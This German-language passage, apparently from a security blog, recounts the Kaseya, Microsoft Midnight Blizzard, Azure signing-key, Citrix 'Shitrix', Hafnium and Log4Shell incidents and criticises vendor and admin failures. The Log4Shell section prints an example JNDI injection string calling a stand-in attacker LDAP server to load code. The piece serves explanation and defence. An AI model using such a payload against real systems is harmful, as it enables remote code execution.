Der Angriff hatte Auswirkungen auf viele Firmen, obwohl laut Kaseya offiziell nur ein paar Dutzend Kunden betroffen waren. Wie kam es dennoch dazu, dass die Auswirkungen 1500 Unternehmen betrafen, darunter große Supermarktketten, die fast alle Filialen zeitweise schließen mussten?

Erklärbar ist das durch eine Art Domino-Effekt. Die von Kaseya genannten 40 betroffenen Firmen waren wohl größtenteils IT-Dienstleister und Systemhäuser, die mit der VSA-Software die Systeme ihrer Kunden verwalteten. Und damit multiplizierte sich der Schaden. Wenn jedes dieser Systemhäuser nur 30-40 Kunden betreut, kommt man schnell auf die betroffenen anderthalbtausend Firmen. Dabei hätte deutlich mehr passieren können. Kaseya selbst hatte zu diesem Zeitpunkt mehr als 36.000 Kunden. Wären zeitgleich Schwachstellen auch in den anderen Kaseya-Produkten von REvil entdeckt worden, wäre der Schaden ungleich höher gewesen.

Den Betroffenen indes ist das kein Trost. Neben dem Verlust von Mitarbeiter- und Kundendaten sowie Geschäftsgeheimnissen standen viele Firmen vor dem Trümmerfeld ihrer IT-Umgebungen und mussten Schritt für Schritt über Monate und Jahre hinweg ihre Infrastruktur wieder aufbauen. Selbst wenn Backups vorhanden waren (was nicht selbstverständlich ist, denn die Backup-Infrastruktur der meisten Unternehmen war oft ebenfalls angreifbar - oder schlicht nicht vorhanden), half das Zurückspielen nur in Einzelfällen, den Wiederaufbau zu beschleunigen. Da unklar war, ab wann die Angreifer tatsächlich auf den Systemen unterwegs waren, konnten oft nur Teile der gesicherten Daten mühsam per Hand zurückgespielt werden. Eine Neustrukturierung der Infrastruktur un die Einschränkung der Möglichkeiten für externe Dienstleister, direkt auf die Systeme zuzugreifen, nahm zumindest ein Teil der Betroffenen in Angriff.

Auch hier wird deutlich, welche Gefahren von starken Abhängigkeiten in der digitalen Lieferkette ausgehen können. Systemhäuser, die ihre vielen Kunden nur deswegen mit einer schmalen Personaldecke versorgen können, weil sie mit ihren Tools permanent direkten Zugriff auf deren Systeme haben, haben ein hohes Potenzial, auch in Zukunft noch nicht absehbaren Schaden anzurichten.

MS Cybersicherheit

Ein mitternächtlicher Schneesturm

Ein im November 2023 auf Microsofts Cybersecurity-Abteilung erfolgter erfolgreicher und erst im Januar 2024 entdeckter Angriff lässt das Vertrauen in den Redmonder Software-Riesen weiter bröckeln. Mutmaßlich eine als “Midnight Blizzard” oder auch “Nobelium” bekannte Gruppe hatte Zugriff auf E-Mails der Mitarbeitenden und Führungskräfte erlangt. Dabei ging es vermutlich primär darum, herauszufinden, was die Analysten über die Gruppe und ihre Aktivitäten wusste, so die Vermutung.

Der Schuster hat die schlechtesten Schuhe

Während nicht nur Microsoft seit Jahren unisono mit Sicherheitsfachkräften dafür wirbt, Zugänge zu Onlinediensten mit modernen Methoden wie Multi-Faktor-Authentication (MFA), FIDO2-Keys und starken Passwörtern abzusichern, scheint das Unternehmen selber die eigenen Ratschläge nicht sonderlich ernst zu nehmen. Gerade bei einem Unternehmen, das verspricht, eine sichere Infrastruktur für seine Kunden zur Verfügung zu stellen, sollte man aber genau das erwarten können.

Nachdem Microsoft Details zum Vorgehen der Angreifer veröffentlicht hat wurde schnell eines klar: Die Mitarbeiter der Abteilung, die für Cybersicherheit im Unternehmen verantwortlich waren, nutzten leicht erratbare Standardkennwörter in ihrer Infrastruktur. Zwar waren die Benutzerkonten selbst zusätzlich mit einem zweiten Faktor abgesichert, aber es existierten Testkonten mit schwachen Kennwörtern - und deaktiviertem zweiten Faktor. Mittels Password Spraying, also dem Ausprobieren der gängigsten Kennwörter auf einzelnen Accounts, gelang es den Angreifern, sich mit einem der Testkonten an der Infrastruktur anzumelden. Dort hatten sie Zugriff auf eine veraltete Testanwendung, die es ihnen erlaubte, sich zusätzliche Rechte zu verschaffen und sich einen eigenen Zugang zu den Exchange Online-Konten der Mitarbeiter einzurichten.

Service-Hygiene und schwachstellenlose Angriffe

Das Unternehmen beeilte sich nach Bekanntwerden des Datenabflusses, zu versichern, dass “Midnight Blizzard” keine Schwachstellen ausgenutzt habe, um sich Zugang zu verschaffen. Dass jedoch ein nicht abgesichertes Testsystem mit veralteten OAuth-Anwendungen der Zugangsweg war, teilten sie anfangs nicht mit. Im Angesicht des Trubels um den Abfluss eines Signing-Keys nur wenige Monate zuvor vielleicht sogar eine verständliche Zurückhaltung, dennoch offenbart es ein fehlendes Sicherheitsempfinden, sogar in den Abteilungen, die sich Sicherheit auf die Fahne geschrieben haben.

Die Frage, warum das Testsystem, obwohl es die Möglichkeit auf Datenzugriff mit erhöhten Rechten bot, nicht ins Monitoring und Alerting eingebunden war, kann nur Microsoft beantworten. Damit wäre sowohl das Fehlen eines MFA-Mechanismus für den zugewiesenen Benutzer, als auch die laufenden Password Spraying-Angriffe aufgefallen. Wenigstens hat Microsoft ausnahmsweise wenigstens im Nachgang selbstkritisch reagiert und einen Blogbeitrag mit Details zum Angriff und Informationen, wie man Systeme gegen die beschriebenen Methoden absichert.

Die wohl nicht zuletzt durch das Signing-Key Debakel befeuerte SFI (Secure Future Initiative) ist wohl bitter nötig - ob Microsoft sich dabei allerdings gerade auf KI verlassen sollte, um Angriffe in Zukunft zu vereiteln? Ich habe da so meine Zweifel.

Azure Signing-Key-Klau

Was ist denn nun schon wieder ein Signing-Key? Und wieso ist er blau?

Azur ist eine schöne Farbe citation needed. Azure ist auch der Name der Cloud-Infrastruktur, die Microsoft an seine Kunden vermietet. Ich habe zudem den Verdacht, dass blau, was “Azure” grob übersetzt bedeutet, manchmal auch den Zustand einiger der dortigen Angestellten treffend beschreibt.

In der Azure-Cloud können alle Arten von Diensten betrieben werden, manche Firmen bilden inzwischen nahezu ihre gesamte Infrastruktur in der Cloud ab - bei Microsoft sowie anderen Anbietern. Doch Azure hat durch die enge Verknüpfung mit dem Windows- und Office-Ökosystem für viele Firmen mit Microsoft-Infrastruktur einen gewissen Reiz.

Ein Signing-Key wird in dieser Infrastruktur verwendet, um Anwendungen oder beispielsweise Zugangstoken digital zu signieren, also als vertrauenswürdig zu markieren. Derartige Signing-Keys gibt es in verschiedenen Abstufungen, von solchen, die nur Microsoft selbst einsetzt um die eigene Software verifizierbar zu machen bis hin zu solchen, die einzelnen Personen erlauben, ihre eigenen Daten zu signieren. Zugangstokens werden verwendet, um nachzuweisen, dass man Zugriff auf bestimmte Daten wie zum Beispiel ein Postfach oder abgelegte Dateien hat. Mittels eines Signing-Keys werden diese Tokens beglaubigt und sollen damit fälschungssicher sein.

Von Schlüsseln und Schlössern

Mitte Juni des Jahres 2023 erlangte Microsoft Kenntnis von seltsamen Vorgängen in der eigenen Infrastruktur. Eine US-Amerikanische Behörde meldete Zugriffe auf die in der Azure-Cloud liegenden Postfächer ihrer Mitarbeiter, die nicht auf reguläre Zugriffe der Angestellten zurückzuverfolgen waren. Die verdächtigen Zugriffe fanden sie in Protokolldaten, die nur Unternehmen und Nutzern zur Verfügung standen, die dafür extra bezahlten.

Schnell wurde klar: Da waren Dritte am Werk, die sich auf irgendeinem Weg Zugriff auf die eigentlich geschützten Daten verschafft hatten. Diese wurden zwar von einer US-Behörde gemeldet, jedoch stellte sich heraus, dass sie es primär auf Europäische Regierungsbehörden und deren Daten in der Azure-Cloud abgesehen hatten.

Doch wie hatten sie das geschafft? Hatten sie Zugangsdaten entwendet oder Accounts durch Brute Force-Angriffe geknackt? Das wäre deutlich sichtbar gewesen und sehr auffällig gewesen. Hatten sie Zugangsdaten aus den zahlreichen online veröffentlichen Breach-Sammlungen verwendet? Auch das ließ sich relativ schnell ausschließen.

Stück für Stück kristallisierte sich heraus, dass offenbar ein interner Signing-Key von Microsoft verwendet wurde, um den Angreifern gültige Zugangstoken für diverse OWA-Zugänge (Outlook Web Access) und Mailpostfächern auf outlook.com auszustellen. Mithilfe dieser Zugangstoken konnten jene nun komplette Postfächer und Datensammlungen abziehen, die eigentlich nur bestimmten Personenkreisen zugänglich sein sollten. Dass die Täter sich gerade Regierungsbehörden als Ziel ausgesucht haben könnte darauf hindeuten, dass es sich um staatlich kontrollierte oder zumindest beauftragte Hacker handeln könnte - das nachzuweisen ist indes schwierig.

Ein Schlüssel für meine Daten, Deine Daten, alle Daten

Wie ein derartig mächtiger Signaturschlüssel einem Unternehmen abhanden kommen konnte, das sich selbst als einen der wichtigsten Identity Provider sieht und zudem einer der drei weltweit größten Cloud-Provider ist, bleibt rätselhaft. Microsoft bestätigte Erkenntnisse der Sicherheitsforscher in Microdosierung und veröffentlichte selber nur Microinformationen. Das Unternehmen spricht von einem “Validation Issue”, das dem eigentlich nur für einen bestimmten Zweck und einen eingeschränkten Nutzerkreis verfügbare Token so umfangreiche Rechte gewährte. Wo und wie der Signing-Key abgegriffen wurde schien auch Microsoft selbst nicht bekannt zu sein. Daran sollte sich auch in den Folgemonaten nichts ändern.

Zwischenzeitlich hatte das auf Cloud-Sicherheit spezialisierte Unternehmen Wiz sich der Thematik angenommen und auf eigene Faust recherchiert. Der gestohlene Schlüssel konnte im Rahmen der Recherche identifiziert und mit Listen von bekannten Signaturschlüsseln von Microsoft und deren Gültigkeitsraum abgeglichen werden. Und als wäre das Abhandenkommen eines vertraulichen Signaturschlüssels nicht schon schlimm genug, platzte an dieser Stelle die nächste Bombe: Der besagte Schlüssel hatte nicht nur bei Exchange Online, sondern nahezu überall im Azure-Ökosystem Anwendungsmöglichkeiten. In Wahrheit handelte es sich nämlich laut Wiz um einen Signing Key für das komplette Azure AD (AAD), den Verzeichnisdienst von Microsoft, der Zugänge zu nahezu jedem Cloud-Dienst von Microsoft verwaltet. Damit gewährte er sogar selbst betriebenen AAD-Instanzen der Microsoft-Kunden, solange diese dem zentralen AAD vertrauten.

Microsofts Reaktionsträgheit

Zwar hatte Microsoft den fraglichen Signing Key zwischenzeitlich gesperrt, doch ist an dieser Stelle unklar, an wie vielen Stellen unberechtigter Weise auf geschützte Daten zugegriffen wurden. Das entsprechende Logging, das diese Frage hätte beantworten können, stand nur Kunden zur Verfügung, die extra dafür bezahlten. Der Großteil der möglicherweise betroffenen Kunden dürfte die entsprechende Option nicht dazugebucht haben. Zwar stellt Microsoft diese Funktion inzwischen allen Azure-Nutzern zur Verfügung, doch bereits erfolgte Zugriffe und Datenabflüsse sind damit trotzdem nicht mehr feststellbar.

Drei Monate nach dem Bekanntwerden der ersten illegalen Zugriffe, im September 2023, veröffentlichte das US-Außenministerium erste Zahlen zu den bis dato nachgewiesenen Datenabflüsse: Rund 60.000 Mails wurden wurden alleine von zehn Accounts des State Department abgezogen. Doch das dürfte nur die Spitze des Eisbergs gewesen sein.

Nahezu zeitgleich veröffentlichte Microsoft einen Blog-Eintrag, in dem beschrieben wurde, wie es zu dem Schlüsseldiebstahl kam - im April 2021. Offensichtlich war der Abfluss dieses mächtigen und besonders schützenswerten Stücks Software seinerzeit niemandem aufgefallen. Der verlinkte Blog-Eintrag musste zudem laut Heise Online im März 2024 von Microsoft korrigiert werden, da im Ursprünglichen Beitrag nachweislich Falschbehauptungen zur Ursache des Vorfalls aufgestellt wurden.

Nachspiel für Microsoft

Anfang April 2024 veröffentlichte nun das Cyber Safety Review Board der US-Behörde CISA (Cybersecurity and Infrastructure Security Agency), das auch für die Aufdeckung der Falschaussagen in Microsofts Blog verantwortlich zeichnet, seinen finalen Bericht in dieser Sache. Der Inhalt dürfte für Microsoft schmerzhaft sein, dem Konzern wird Versagen auf verschiedensten Ebenen vorgeworfen. Die CISA empfiehlt den Redmondern zudem, zuerst ihre Sicherheit zu verbessern, bevor weiter an neuen Cloud-Diensten gearbeitet wird.

Auch ein weiterer Angriff im Vorjahr auf Microsoft, der Anfang des Jahres bekannt wurde, bestärkte die CISA in ihrer Ansicht, Microsoft werde seiner Verantwortung in Bezug auf IT-Sicherheit nicht gerecht. Wie Microsoft auf die daraus resultierenden Forderungen reagiert steht derzeit noch in den Sternen.

Shitrix

Klingt dreckig - isses aber auch!

“Shit, Citrix!” wird wohl der ursprüngliche Ausruf gewesen sein. Zu “Shitrix” ist es da nur noch ein nachvollziehbarer Katzensprung. Ende 2019 fiel ein Netscaler (oder ADC) der Firma Citrix nach dem anderen um, da sie eine RCE-Schwachstelle (Remote Code Execution) aufwiesen, die sich trivial durch Angreifer ausnutzen ließ. Die Folge war, dass nicht nur die Netscaler in fremder Hand waren, sondern auch Zugangsdaten zu internen Systemen dabei abhanden kommen oder gar direkt Angriffe auf interne Infrastruktur gefahren werden konnte.

Altbekannter Angriffsweg, neu implementiert

Die Netscaler hatten im Web-Management-Interface zwei Schwachstellen, die den Zugriff auf eigentlich nicht zugänglichen Dateien im Dateisystem des Servers zuließen. Es handelte sich zum einen um eine sogenannte “Directory Traversal”-Lücke, mit der sich ein Angreifer Schritt für Schritt die Ordner im Dateisystem nach oben springen und von dort auf weitere Dateien zugreifen kann. Über diese Lücke konnte ein Angreifer direkt auf bestimmte Perl-Dateien zugreifen. In einer von diesen Dateien schlummerte eine weitere Sicherheitslücke, die es dem Angreifer erlaubte, eine weitere Datei zu erstellen, deren Inhalte teilweise unter der Kontrolle des Angreifers waren. Kopierte man diese Datei schließlich in eins der Perl Template-Verzeichnisse, wurde darin platzierter Code direkt im Kontext des Perl-Interpreters ausgeführt, was root-Zugriff auf die Maschine ermöglichte. Da hierfür keinerlei Anmeldung am System notwendig war, schossen sich bereits nach kürzester Zeit Angreifer auf diese Schwachstelle ein.

Directory Traversal-Schwachstellen sind lange bekannt und sollten eigentlich jedem Programmierer bekannt sein. Ab und zu schleichen sie sich dennoch in den Quellcode ein und erfreuen Angreifer von nah und fern. In Kombination mit einer Schwachstelle, die das Schreiben von Dateien erlaubt, sind sie eine Garantie für jede Menge Chaos.

Netscaler müde, Netscaler schlafen…

Für einmal kompromittierte Netscaler gab es eigentlich nur die Option des Gnadenschusses. Nachzuvollziehen, was auf dem betroffenen System im Detail durch die Angreifenden verändert wurde, erforderte eine zeitaufwändige forensische Untersuchung, und selbst diese konnte oft keinen Aufschluss darüber geben, ob eine verfügbare Verbindung ins interne Netzwerk ausgenutzt wurde oder ob Zugangsdaten, beispielsweise zum Active Directory, abgeflossen sind. Es stellte sich heraus, dass die Suche auf dem Domain Controller und anderen Systemen erfolgsversprechender war als auf dem Netscaler selbst. Dieser wurde oft erst für eine eventuelle spätere Untersuchung weggesichert und dann neu aufgesetzt - eine andere Möglichkeit, für einen sauberen Betrieb ohne Hintertüren auf dem Gerät selbst zu sorgen, gab es nicht.

Um die frisch installierten Netscaler nicht direkt wieder den Angreifern zu überlassen (Citrix ließ sich bis zum 21.01.2020 Zeit mit der Bereitstellung), mussten die Administratoren der knapp 40.000 betroffenen und mit im Internet erreichbaren Webinterface konfigurierten Netscaler selbst tätig werden. Citrix veröffentlichte noch im Dezember eine Anleitung, wie man die Server bis zur Verfügbarkeit eines Patches absichern konnte. Doch wie sich herausstellte, setzten nur wenige Verantwortliche die entsprechenden Maßnahmen um. Etwa ab September 2020 begannen die Angreifer, die ein dreiviertel Jahr zuvor kompromittierten und nicht bereinigten Systeme anzugreifen. Deutschlandweit waren zu diesem Zeitpunkt noch gut 200 ungepatchte Systeme online. Danach zu urteilen, wie viele Hilfsanfragen von Administratoren mit gepatchten, aber bereits zuvor mit einer Backdoor versehenen und nun nachträglich angegriffenen Systemen allein uns erreichten, war die Anzahl der unentdeckten Kompromittierungen um ein vielfaches höher.

Und es waren nicht kleine KMUs, die da wie die Fliegen gefallen sind (für die meisten dieser Unternehmen wäre ein Netscaler so oder so der Overkill gewesen). Das wohl prominenteste Beispiel war das Uniklinikum Düsseldorf, das nach der Folgeinfektion lange Zeit von der Notversorgung abgemeldet war (und dem bei der Umleitung an ein anderes Krankenhaus eine Patientin verstarb). Aber auch Behörden, Rettungsdienstleitstellen, weitere Krankenhäuser, Universitäten, Gemeindeverwaltungen, Landtage und viele Firmen.

Die Schuldfrage

Dass den Programmierern der Netscaler ein derartig vermeidbarer Fehler unterlief ist peinlich. Immerhin vertreibt Citrix mit diesen Geräten Sicherheitslösungen, die voraussetzen, dass die Programmierer wenigstens die Basics der sicheren Programmierung beherrschen und sich von den zahlreichen Tools unterstützen lassen, die derartige Fehler im Quellcode direkt entdecken. Dennoch hat Citrix nach Bekanntwerden der Shitrix-Sicherheitslücke immerhin schnell reagiert und Anleitungen zur Verfügung gestellt, um die Systeme erst einmal abzusichern und die Gefahr zu bannen.

Versagt haben hier tatsächlich hauptsächlich die meisten Administratoren, die entsprechende Geräte betrieben haben. Das Thema zu übersehen war nahezu unmöglich. In jeder Fachzeitschrift, in nahezu jeder Online-Redaktion für IT-Themen, sogar bei Fefe und natürlich in den Security Bulletins von Citrix selbst wurde es aufgegriffen. Also eigentlich das, was Administratoren sowieso jeden Tag konsumieren. Selbst die klassischen Medien griffen die Schwachstelle auf, nachdem Verwaltungen und Krankenhäuser aufgrund von Folgeangriffen gegen Ende des Jahres 2020 offline gingen.

Zeit genug also, das zu tun, was der Hersteller und viele Experten vorgaben: Auf Kompromittierung prüfen (das dauerte nur wenige Minuten), im Zweifel wegsichern, neu aufsetzen, updaten, absichern, Zugänge ändern, auf kompromittierte Infrastruktur prüfen. Arbeitsaufwändig, aber jede darin investierte Minute war es wert und ersparte einem das, was ansonsten zwangsläufig folgen musste. Leider drang diese Erkenntnis zu vielen erst durch, als es deutlich zu spät war.

xz-Backdoor (WIP)

Vor kurzem durfte ich auf dem HiSolutions Research Blog meinen Artikel zu besagter Backdoor veröffentlichen, den ich mit meinem Kollegen Justus gemeinsam verfasst habe. Bitte schaut vorerst dort vorbei, während ich hier eine kurze Zusammenfassung und meine persönlichen Gedanken aufgeschrieben habe.

Hafnium

72Hf - was bitte?

Hafnium, ist das nicht ein Übergangsmetall mit der Ordnungszahl 72? Korrekt, aber um dieses schöne Element geht es ausnahmsweise nicht, sondern um eine Schwachstelle und übergreifendes Versagen sowohl bei Microsoft als auch bei vielen Firmen weltweit, die Administratoren und IT-Sicherheitsfachleute Anfang 2021 für einige Monate in Atem hielt. Doch der Reihe nach!

Chronik des Versagens

Am 03.03.2021 veröffentlichte Microsoft ein Sicherheitsupdate, das eine Handvoll Schwachstellen im hauseigenen Mailserver Exchange schlossen. Administratoren und Kenner der Microsoft-Updatestrategie werden hier schon aufhorchen, weicht doch der Termin stark von den sonst Mitte des Monats stattfindenden Regelupdates ab. Solche Abweichungen sind selten und haben meist gewichtige Gründe, die ein schnelles Handeln der Betreiber von Microsoft-Servern erfordert.

So war es auch hier. Während Microsoft anfangs den Schweregrad der behobenen Sicherheitslücken noch herunterspielte, rief das Bundesamt für Sicherheit in der Informationstechnik (BSI) relativ schnell die Alarmstufe Rot aus. Doch was war eigentlich geschehen und wie konnte es im Laufe der folgenden Tage und Wochen zu einem weltweiten Chaos kommen?

Wir gehen ein paar Monate zurück ins Jahr 2020, wo Mitte Dezember Sicherheitsforscher des Taiwanesischen Unternehmens Devcore eine Schwachstelle in Exchange fanden, die sie ProxyLogon nannten. Mit dieser konnten sie die Anmeldung am Server aushebeln und sich mit administrativen Rechten auf dem Exchange bewegen. Im Rahmen der Untersuchung dieser Thematik entdeckten sie eine weitere Schwachstelle, mittels derer sich Schadprogramme direkt auf dem Exchange ausführen ließen. Für einen Administratoren ist so etwas normalerweise der worst case, da sich das System damit komplett in Angreiferhand befinden kann. Devcore jedenfalls tat das einzig Richtige (meiner Meinung nach, jedenfalls), baute einen sogenannten proof of concept, also eine lauffähige Demonstration des Angriffspfades, und schickte diesen am 05.01.2021 an Microsoft. damit die Sicherheitslücke gestopft werden konnte.

Microsoft bestätigte die Schwachstelle auch innerhalb weniger Tage und reagierte darüber hinaus innerhalb weniger Wochen… nicht. Bis Anfang Februar 2021 stand kein Sicherheitsupdate bereit, Microsoft vertröstete die Sicherheitsforscher auf den 09.03.2021, also den nächsten Patch Day, nachdem der letzte ohne Bugfix verstrichen war. Kurzfristig wurde die Veröffentlichung schließlich auf den 03.03.2021 vorgelegt. Die Sicherheitslücke war zu diesem Zeitpunkt bereits seit drei Monaten bekannt.

Man könnte meinen, dass damit alles gut sei, die Sicherheitslücke war gepatcht, wenn auch spät, und alle sind mit einem blauen Auge davon gekommen. Doch weit gefehlt!

And so it begins

Bereits Anfang Januar 2021 beobachtete die Sicherheitsfirma Volexity, dass Exchange-Server über eine bis dahin unbekannte Sicherheitslücke angegriffen wurden. Es handelte sich um die bereits einige Tage vorher auch von Devcore entdeckte Schwachstelle. Ende Januar meldeten Sicherheitsforscher der Firmen Dubex und Trend Micro die ersten beobachteten Angriffe auf Exchange-Server und berichteten von installierten Webshells, also von den Angreifern abgelegten Scripten für einen persistenten Zugang zu den kompromittierten Servern. Auch Volexity meldete separat die Schwachstelle Anfang Februar 2021 an Microsoft. Spätestens ab diesem Zeitpunkt wusste der Hersteller also nachweisbar von der Schwachstelle und deren Ausnutzung, wobei man sich die Frage stellen darf, ob (und wenn nicht: wieso) die hauseigenen Lösungen wie z.B. Microsoft Defender for Endpoint die Angriffe nicht schon ab Anfang Januar nach Redmont gemeldet haben. Sicher, nicht jeder hat dieses kostenpflichtige Zusatzpaket auf seinen Systemen installiert, aber dass kein einziger der Betroffenen es im Einsatz gehabt haben soll? Unwahrscheinlich.

Wieder geschah einen Monat lang nichts. Ende Februar geschah dann doch etwas, aber nicht das, was sich viele Windows-Administratoren mit Sicherheit gewünscht hätten. Es kam kein Notfallupdate seitens Microsoft, sondern ein breit angelegter Massenscan, die die weitestgehend schutzlos im Internet stehenden Exchange-Server identifizierte (merke: Nicht infizierte, das beschränkte sich noch auf wenige Systeme). Knapp eine Woche später veröffentlichte Microsoft das ersehnte Update, doch die Angreifer reagierten schnell. Nur wenige Stunden, nachdem das außerplanmäßige Notfall-Update freigegeben wurde, setzte eine Angriffswelle ein, die die bis dahin als verwundbar identifizierten Exchange-Server überrollte. Die wenigsten Administratoren hatten zwischen Veröffentlichung des Patches und dem Start des Angriffs Zeit, die Patches einzuspielen. Viele mögen die Veröffentlichung auch gar nicht auf dem Plan gehabt haben, da sie außerplanmäßig erfolgte.

Aber auch die, die es rechtzeitig schafften, den Patch einzuspielen, waren unter Umständen nicht aus dem Schneider: Der Patch schloss die Lücke unter bestimmten Umständen nur unvollständig und so blieben auch viele gepatchte Systeme verwundbar. Einige Systeme ließen die Installation des Patches gar nicht erst zu, da sie einige dafür benötigte Updates nicht installiert hatten - eine Abhängigkeit, die Microsoft wieder erst Tage später, am 09.03.2021 entfernte und so die Installation des Patches auch auf Systemen mit älterem Updatestand zuließ.

Was folgte waren die wohl turbulentesten Wochen und Monate in der IT-Welt des Jahres 2021. Auch heute, Jahre später, verziehen viele Systemverantwortliche das Gesicht, wenn sie das Wort “Hafnium” hören. Hunderttausende Server weltweit waren kompromittiert, alleine in Deutschland dürften es zehntausende gewesen sein. IT- und Krisendienstleister unterstützten die Administratoren mit Rat und Tat sowie mit täglich aktualisierten Informationen und Leitfäden, um eine Kompromittierung der Server erkennen udn beseitigen zu können. Gerade diese Dienstleister kamen während der ersten Jahreshälfte an ihre personellen Grenzen, um die Flut der Anfragen abfangen zu können.

Aftermath & lessons learned

Kurioserweise sorgte vermutlich alleine die Masse der infizierten Systeme dafür, dass viele Unternehmen keinen langfristigen Schaden davon getragen haben. Die Angreifer konnten nicht gleichzeitig eine sechs- bis siebenstellige Anzahl von Servern übernehmen und beließen es in vielen Fällen vorerst dabei, die für sie uninteressanten Systeme nur mit einer Backdoor zu versehen und sich auf die Ziele zu konzentrieren, bei denen sie fette Beute erwarteten. Das verschaffte den anderen Unternehmen Zeit, die Systeme zu überprüfen, zu bereinigen oder neu aufzusetzen.

Am Ende bleibt ein bitterer Nachgeschmack und die Frage, wer die Hauptschuld an diesem Desaster trägt. Sicherheitsforscher und auf IT-Sicherheit spezialisierte Firmen wie Devcore, Volexity, Dubex, Trend Micro und viele andere, die die Schwachstellen schnell und mit allen nötigen Informationen an Microsoft gemeldet hatten, haben sich vorbildlich verhalten. Microsoft verschlief die Bereitstellung eines Patches für mehrere Monate und schaffte es zudem nicht einmal, mit dem ersten Patch die Sicherheitslücke komplett zu schließen, geschweige denn den Patch so auszuliefern, dass er auch auf Systemen mit Patchrückstand installiert werden konnte. Auch die anfängliche Verharmlosung der Thematik, obwohl bei Microsoft längst das Ausmaß der Angriffe bekannt gewesen sein dürfte, führte dazu, dass Administratoren die Bedrohung nicht ernst nahmen.

Doch nur mit dem Finger auf Microsoft zu zeigen wäre zu einfach, denn auch schlecht gewartete Server auf Kundenseite sowie die teilweise komplett fehlende oder nicht ausreichende Absicherung der Systeme, die oft direkt aus dem Internet erreichbar waren, erleichterte den Angreifern den Angriff enorm. Hier taten sich häufig dieselben Abgründe wie bei nahezu jedem Sicherheitsvorfall auf, bei dem schlecht gewartete Systeme eine Rolle spielten: Schlecht ausgebildete Administratoren, fehlende Sicherheitsinfrastruktur, keine Überwachung der Systeme auf Anomalien. Und wie so häufig waren die Gründe: Kein Geld, keine Zeit, kein Personal. Ein deutlicher Weckruf für die Entscheider in allen Unternehmen: IT-Sicherheit richtig zu machen kostet Geld, aber nicht so viel, wie ein großer Vorfall kostet.

Log4Shell

Systemzugriff über verschlungene Pfade

Wie schon erwähnt war 2021 ein turbulentes Jahr. Kaum hatte sich die IT-Welt ein wenig von Hafnium erholt, platzte die nächste Sicherheitslücke herein, die das Potenzial hatte, größten Schaden anzurichten. Sie wurde unter dem Namen Log4Shell bekannt und der Name lässt Böses erahnen. Kurz gesagt ermöglichte sie die Ausführung von Befehlen auf Systemen, die nicht einmal direkt erreichbar sein mussten. Ein vermeintlich harmlos aussehender Aufruf eines Webservices genügte oft.

Tag 0

Log4Shell war eine sogenannte Zero-Day-Schwachstelle (0-day), also eine Schwachstelle, die bekannt wurde, bevor sie gepatcht werden konnte. Sie wurde am 24.11.2021 von dem Security Team von “Alibaba Cloud”, einer Tochterfirma des chinesischen Konzerns Alibaba, entdeckt und an Apache, die für log4j verantwortliche Organisation, gemeldet. Zwei Wochen später, am 09.12.2021, veröffentlichte der Nutzer tangxiaofeng7 auf Github einen PoC (Proof of Concept, ein lauffähiges Programm, um die Existenz der Schwachstelle zu belegen). Dass Schwachstellen veröffentlicht werden, bevor sie behoben wurden, wird in der IT Security-Community mindestens als schlechter Stil und in der Regel als Verstoß gegen diverse Verhaltensregeln wahrgenommen. Kommt es trotzdem zu einer 0-day Veröffentlichung, ist schnelles Handeln angesagt. Das war bei Log4Shell ganz besonders wichtig, denn betroffen war die log4j-Bibliothek, die in zahllosen Java-Programmen zum Einsatz kommt - von IoT-Geräten bis zu Anwendungsservern.

Aufgefallen war die Schwachstelle übrigens im Spiel Minecraft. Ein Spieler hatte herausgefunden, dass er mit speziell formatierten Strings im Spielerchat den Server veranlassen konnte, untergeschobenen Code auf dem System des Betreibenden auszuführen.

Die Log4Shell-Anatomie

Die Sicherheitslücke selbst ist im Grunde schnell beschrieben: Die log4j-Bibliothek hatte in allen Versionen zwischen 2013 und 2021 einen bis dato unentdeckten Fehler in der Validierung von Zeichenketten, die in eine Logdatei geschrieben werden sollen. Dies erlaubte es, spezielle Zeichenketten in die Anfrage einzuschleusen, die von log4j nicht literal - also unverändert - ausgegeben werden, sondern vorher als Befehlssequenz interpretiert werden.

Im Fall von log4shell konnte in die Logmeldung ein JNDI-String eingebettet werden. JNDI (Java Naming and Directory Interface) ist eine Java-Komponente, die es erlaubt, andere Quellen (wie LDAP) abzufragen und die Antwort als Java-Objekt einzubetten. Gedacht ist diese Erweiterung, um beispielsweise inline sperrige System-Benutzerkontennamen wie “FS1337” in lesbare Namen wie “Folker Schmidt” umzuwandeln, ohne dafür jedes mal eigene Routinen schreiben zu müssen. Man lädt sie einfach nach. Ein Bequemlichkeits-Feature, das meiner Erfahrung nach selten und vor allem im Logging-Umfeld (für das log4j verwendet wird) so gut wie gar nicht zum Einsatz kommt. Doch irgendjemand hatte vor vielen Jahren entschlossen, dass dieses Feature in log4j seinen Platz hat (zum Beispiel, um das Logging on the fly anzupassen, ohne den Quellcode von log4j direkt anpassen zu müssen) und es implementiert.

Nun hatte nur niemand daran gedacht, dass jemand auf die Idee kommen konnte, einen entsprechend formatierten JNDI-String an Stellen zu platzieren, die üblicherweise auch in Logdateien weggeschrieben werden. Zum Beispiel in einem HTTP-Header. Es hatten auch die wenigsten Administratoren daran gedacht, die Server, auf denen die Java-Anwendungen und damit auch die log4j-Komponente laufen, so abzusichern, dass Aufrufe zu LDAP-Servern verboten sind, die sich außerhalb des eigenen Netzwerks befinden.

JNDI nach Hause telefonieren!

Bettete nun ein Angreifer etwas wie {$jndi:ldap://angreiferserver:389/schadcode} in einen HTTP-Header ein und schickte eine Anfrage an einen verwundbaren Webserver, interpretierte der den JNDI-String als Aufforderung, sich auf den angegebenen Server zu verbinden und den String mit dem zurückgegebenen Resultat zu ersetzen. Wer auf dem entsprechenden Server als Antwort eine .class-Datei hinterlegt hat, konnte in dieser nahezu beliebigen Schadcode platzieren, der dann im Kontext des Java-Programms ausgeführt wurde. Es war weder eine Anmeldung am verwundbaren System notwendig, noch weitere Maßnahmen: Wer sich eine Backdoor in die Datei geschrieben hatte, konnte das System dazu bringen, einen direkten Zugriff auf eine Shell zu gewähren. Eine erstklassige unauthenticated RCE (Remote Code Execution). Und da viele Tools der Bequemlichkeit halber (und um einfach an Schreibrechte für Logverzeichnisse zu kommen) als root/Administrator laufen, hatte man oft direkt vollen Systemzugriff.

